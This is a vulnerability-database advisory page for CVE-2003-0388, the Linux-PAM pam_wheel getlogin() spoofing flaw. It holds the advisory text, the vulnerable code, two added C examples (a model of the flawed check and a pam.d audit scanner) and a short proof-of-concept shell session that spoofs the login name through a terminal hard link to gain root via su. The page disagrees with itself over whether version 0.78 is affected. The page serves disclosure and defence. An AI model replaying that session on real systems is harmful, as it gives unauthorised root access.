CVE-2003-0388
CVSS 4.6
Published: 2003-07-24 00:00:00
Last revised: 2016-10-17 22:33:13
NMCOES    

[Original] pam_wheel in Linux-PAM 0.78, with the trust option enabled and the use_uid option disabled, allows local users to spoof log entries and gain privileges by causing getlogin() to return a spoofed user name.


[CNNVD] Linux-PAM getlogin() spoofing vulnerability (CNNVD-200307-045)

        
        Pluggable Authentication Modules (PAM) is the mechanism used on many Linux distributions to authenticate users.
        pam_wheel in Linux-PAM does not use the getlogin() function safely. A local attacker can exploit this to bypass the wheel-group check and obtain root privileges without a password.
        The pam_wheel module is normally stacked with su(1) to let members of a trusted group (wheel by default) become root without a password. To decide who is calling, the module uses getlogin() to obtain the name of the logged-in user and then compares that name against the member list of the trusted group named in the configuration. The relevant code is:
        fromsu = getlogin();
        if (fromsu) {
         tpwd = getpwnam(fromsu);
        }
        ...
        /*
        * test whether the user is a member of the group, or has "wheel" as primary group
        */
        if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {
         if (ctrl & PAM_DENY_ARG) {
         retval = PAM_PERM_DENIED;
         } else if (ctrl & PAM_TRUST_ARG) {
         retval = PAM_SUCCESS; /* this can be a sufficient check */
         } else {
         retval = PAM_IGNORE;
         }
        } else {
         ...
        }
        When the "trust" option is enabled in the pam_wheel configuration and the "use_uid" option is not, any local user can spoof the user name returned by getlogin() and obtain superuser privileges without a password. getlogin() derives the name from the utmp record of the terminal attached to standard input, not from the real uid of the calling process, so a caller who can open another user's terminal device controls what it returns; with use_uid the module identifies the caller by getuid() instead, which the caller cannot influence.
        This configuration is not the default on most Linux installations.
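To make the two identification paths concrete, here is an added example, written for this page rather than taken from Linux-PAM or from the advisory, that mirrors the decision shown above with the caller-identification step isolated in its own function. The names used here (wheel_decide, caller_from_login, caller_from_uid, the WHEEL_* flags, the wheel_result values and the sample passwd/group records) are this example's own; the real module returns PAM_SUCCESS, PAM_IGNORE and PAM_PERM_DENIED. The non-member branch is cut off in the excerpt, so the example assumes it follows the documented meaning of the deny option (reverse the sense of the check).

```c
/*
 * Added example, not pam_wheel's own code: the group decision from the
 * excerpt, with the attacker-influenced step (identifying the caller)
 * isolated so the getlogin() and getuid() paths can be compared.
 * Names (wheel_decide, caller_from_login, caller_from_uid, WHEEL_*,
 * wheel_result) and the sample records are this example's own.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
#include <grp.h>

/* Stand-ins for PAM_PERM_DENIED / PAM_SUCCESS / PAM_IGNORE. */
enum wheel_result { WHEEL_RESULT_DENIED = 0, WHEEL_RESULT_SUCCESS = 1, WHEEL_RESULT_IGNORE = 2 };

#define WHEEL_DENY    0x01   /* "deny" option: reverse the sense of the check */
#define WHEEL_TRUST   0x02   /* "trust" option: members need no password */
#define WHEEL_USE_UID 0x04   /* "use_uid" option: identify caller by real uid */

/* True if name appears in a NULL-terminated member list (the excerpt's is_on_list). */
static int is_on_list(char *const *list, const char *name)
{
    for (; list && *list; list++)
        if (strcmp(*list, name) == 0)
            return 1;
    return 0;
}

/* Vulnerable identification (use_uid absent). getlogin() maps the terminal on
 * standard input to a utmp record and returns that record's user name; the PoC's
 * "ln /dev/tty tty1; bash < tty1" makes stdin look like root's tty1, so root's
 * name comes back although the process still runs as the attacker. */
static struct passwd *caller_from_login(void)
{
    const char *name = getlogin();
    return name ? getpwnam(name) : NULL;
}

/* Hardened identification (use_uid present). The real uid is set by the kernel
 * and cannot be changed by redirecting file descriptors. */
static struct passwd *caller_from_uid(void)
{
    return getpwuid(getuid());
}

/* The group test from the excerpt, applied to an already-identified caller. */
static enum wheel_result wheel_decide(const struct passwd *caller,
                                      const struct group *wheel, int ctrl)
{
    if (!caller || !wheel)
        return WHEEL_RESULT_DENIED;                 /* could not identify the caller */

    int member = is_on_list(wheel->gr_mem, caller->pw_name) ||
                 caller->pw_gid == wheel->gr_gid;  /* explicit member or primary group */

    if (member) {
        if (ctrl & WHEEL_DENY)  return WHEEL_RESULT_DENIED;
        if (ctrl & WHEEL_TRUST) return WHEEL_RESULT_SUCCESS; /* no password asked */
        return WHEEL_RESULT_IGNORE;                          /* let later modules decide */
    }
    /* Assumption: non-member branch follows the documented meaning of "deny". */
    return (ctrl & WHEEL_DENY) ? WHEEL_RESULT_IGNORE : WHEEL_RESULT_DENIED;
}

/* Full check: which identification is used depends only on use_uid. */
static enum wheel_result wheel_check(const struct group *wheel, int ctrl)
{
    struct passwd *caller = (ctrl & WHEEL_USE_UID) ? caller_from_uid()
                                                   : caller_from_login();
    return wheel_decide(caller, wheel, ctrl);
}

/* Constructed sample data so the decision can be exercised without a real
 * wheel group: root is an explicit member, ops has wheel as primary group,
 * farmer is in neither position. */
static char *sample_members[] = { "root", NULL };
static struct group  sample_wheel  = { .gr_name = "wheel",  .gr_gid = 10, .gr_mem = sample_members };
static struct passwd sample_root   = { .pw_name = "root",   .pw_uid = 0,    .pw_gid = 0 };
static struct passwd sample_ops    = { .pw_name = "ops",    .pw_uid = 1002, .pw_gid = 10 };
static struct passwd sample_farmer = { .pw_name = "farmer", .pw_uid = 1001, .pw_gid = 100 };

int main(void)
{
    /* Same binary, two policies: "trust" alone vs "trust use_uid". */
    printf("trust only    -> %d\n", wheel_check(&sample_wheel, WHEEL_TRUST));
    printf("trust use_uid -> %d\n", wheel_check(&sample_wheel, WHEEL_TRUST | WHEEL_USE_UID));
    printf("farmer/trust  -> %d (0 = denied)\n",
           wheel_decide(&sample_farmer, &sample_wheel, WHEEL_TRUST));
    return 0;
}
```

Run as an unprivileged user with stdin on your own terminal, both wheel_check calls give the same answer. Redirect stdin from another user's terminal device, as the proof-of-concept session further down the page does, and only the trust-only call changes: caller_from_login() now reports the other user while caller_from_uid() still reports you. That difference is the whole vulnerability, and use_uid is the option that selects the second path.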
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0388
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0388
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-045
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105577915506761&w=2
(UNKNOWN)  BUGTRAQ  20030616 FW: iDEFENSE Security Advisory 06.16.03: Linux-PAM getlogin() Spoofing
http://www.idefense.com/advisory/06.16.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/06.16.03.txt
http://www.redhat.com/support/errata/RHSA-2004-304.html
(UNKNOWN)  REDHAT  RHSA-2004:304

- Vulnerability information

Linux-PAM getlogin() spoofing vulnerability
Medium severity  Access validation error
2003-07-24 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        Vendor patch:
        Andrew G. Morgan
        ----------------
        The vendor has not yet released a patch or upgrade for this issue; users of this software are advised to follow the vendor's site for the latest version:
        
        http://www.kernel.org/pub/linux/libs/pam/

- Vulnerability information (22781)

Linux-PAM 0.77 Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability (EDBID:22781)
linux local
2003-06-16 Verified
0 Karol Wiesek
N/A
source: http://www.securityfocus.com/bid/7929/info

A vulnerability has been discovered in the Linux-PAM pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials (the trust option) and is not configured to verify the user's UID (the use_uid option), it may be possible for a local attacker to elevate privileges.

This can be accomplished by spoofing the user's login name, as returned by the getlogin() function, to that of a logged-in user in the wheel group.

Successful exploitation of this condition could ultimately result in an attacker gaining local root access on the target system.

$ w
 10:32am  up 3:26,  2 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM              LOGIN@    IDLE    JCPU    PCPU   WHAT
root     tty1     -                 7:13am    3:03m   0.30s   0.22s  -bash
farmer   pts/0    172.16.60.5       10:32am   0.00s   0.00s   ?      -

$ logname
farmer

$ ln /dev/tty tty1
$ bash < tty1

$ logname
root

$ su -
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

- Vulnerability information

9027
PAM getlogin Privilege Escalation

- Timeline

2003-06-16 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Linux-PAM Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability
Access Validation Error 7929
No Yes
2003-06-16 12:00:00 2009-07-11 10:06:00
The discovery of this vulnerability has been credited to Karol Wiesek (appelast@bsquad.sm.pl).

- Affected program versions

RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Linux-PAM Linux-PAM 0.77
Linux-PAM Linux-PAM 0.78

- Unaffected program versions

Linux-PAM Linux-PAM 0.78


- Exploit

No exploit is required. The proof-of-concept session reproduced above under the Exploit-DB entry (EDBID:22781) is the demonstration provided with the original report.

- Solution

It has been reported that Linux-PAM 0.78 is not affected by this issue. The vendor has announced that a fix for version 0.77 will not be released and a new version of Linux-PAM will also not be released. Users are advised to upgrade to the unaffected version as soon as possible. Note that the MITRE description at the top of this page names 0.78 as the affected version and the affected/unaffected lists above both contain 0.78, so do not rely on the version string alone: the weakness is only present when pam_wheel is configured with trust and without use_uid, and adding use_uid (or dropping trust) closes it regardless of version.

Red Hat has released advisory RHSA-2004:304-05 and fixes to address this issue on Red Hat Enterprise Linux platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see the referenced advisory for additional information.

A Fedora Legacy advisory (FLSA:152771) and updates are available to address this issue for Red Hat Linux. Please see the referenced advisory for further information on obtaining and applying the appropriate updates.


Linux-PAM Linux-PAM 0.77
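A quick way to find the weak configuration on a host is to scan the PAM service files for pam_wheel.so lines that carry trust but not use_uid. The following audit routine is an added example for this page, not part of the Red Hat or Linux-PAM fixes; classify_pam_line, count_weak_lines and the embedded sample /etc/pam.d/su text are this example's own. It reads the /etc/pam.d line format (type, control, module path, options) and also copes with the bracketed [value=action ...] control syntax, because it locates the module token by name rather than by position.

```c
/*
 * Added example (not from the advisory or from Linux-PAM): scan PAM
 * configuration lines for pam_wheel.so entries that have "trust" but
 * not "use_uid", the exact condition CVE-2003-0388 depends on.
 * Names (classify_pam_line, count_weak_lines, basename_of) and the
 * sample configuration text are this example's own.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum pam_line_kind { NOT_PAM_WHEEL = 0, WHEEL_OK = 1, WHEEL_WEAK = 2 };

/* File-name part of a module path ("/lib/security/pam_wheel.so" -> "pam_wheel.so"). */
static const char *basename_of(const char *path)
{
    const char *slash = strrchr(path, '/');
    return slash ? slash + 1 : path;
}

/* Classify one line of /etc/pam.d/<service>. Tokens before the module name
 * (type, control, bracketed control) are skipped; tokens after it are options. */
static enum pam_line_kind classify_pam_line(const char *line)
{
    char buf[512];
    const char *p = line;
    while (isspace((unsigned char)*p))
        p++;
    if (*p == '#' || *p == '\0')
        return NOT_PAM_WHEEL;                     /* comment or blank line */

    strncpy(buf, p, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';

    int seen_module = 0, has_trust = 0, has_use_uid = 0;
    for (char *tok = strtok(buf, " \t\r\n"); tok; tok = strtok(NULL, " \t\r\n")) {
        if (!seen_module) {
            if (strcmp(basename_of(tok), "pam_wheel.so") == 0)
                seen_module = 1;
            continue;
        }
        if (strcmp(tok, "trust") == 0)   has_trust = 1;
        if (strcmp(tok, "use_uid") == 0) has_use_uid = 1;
    }
    if (!seen_module)
        return NOT_PAM_WHEEL;
    return (has_trust && !has_use_uid) ? WHEEL_WEAK : WHEEL_OK;
}

/* Count weak pam_wheel lines in a whole configuration text (newline separated). */
static int count_weak_lines(const char *text)
{
    int weak = 0;
    const char *start = text;
    while (*start) {
        const char *nl = strchr(start, '\n');
        size_t len = nl ? (size_t)(nl - start) : strlen(start);
        char line[512];
        if (len >= sizeof line)
            len = sizeof line - 1;                /* overlong lines are truncated */
        memcpy(line, start, len);
        line[len] = '\0';
        if (classify_pam_line(line) == WHEEL_WEAK)
            weak++;
        if (!nl)
            break;
        start = nl + 1;
    }
    return weak;
}

/* Constructed sample /etc/pam.d/su: the vulnerable line followed by the safe form. */
static const char sample_su_config[] =
    "#%PAM-1.0\n"
    "auth  sufficient  pam_rootok.so\n"
    "# vulnerable: wheel members pass without a password, identity from getlogin()\n"
    "auth  sufficient  pam_wheel.so trust\n"
    "# safe: identity from getuid() instead\n"
    "auth  sufficient  pam_wheel.so trust use_uid\n"
    "auth  required    pam_unix.so\n";

int main(void)
{
    printf("weak pam_wheel lines in sample: %d\n", count_weak_lines(sample_su_config));
    return 0;
}
```

To audit a real system, read /etc/pam.d/su (and any other service file that stacks pam_wheel, such as login or sudo) into a buffer and pass it to count_weak_lines(); a non-zero result points at a line that needs use_uid added or trust removed.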


About the SCAP Chinese Community

SCAP中文社区 is the first Chinese open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.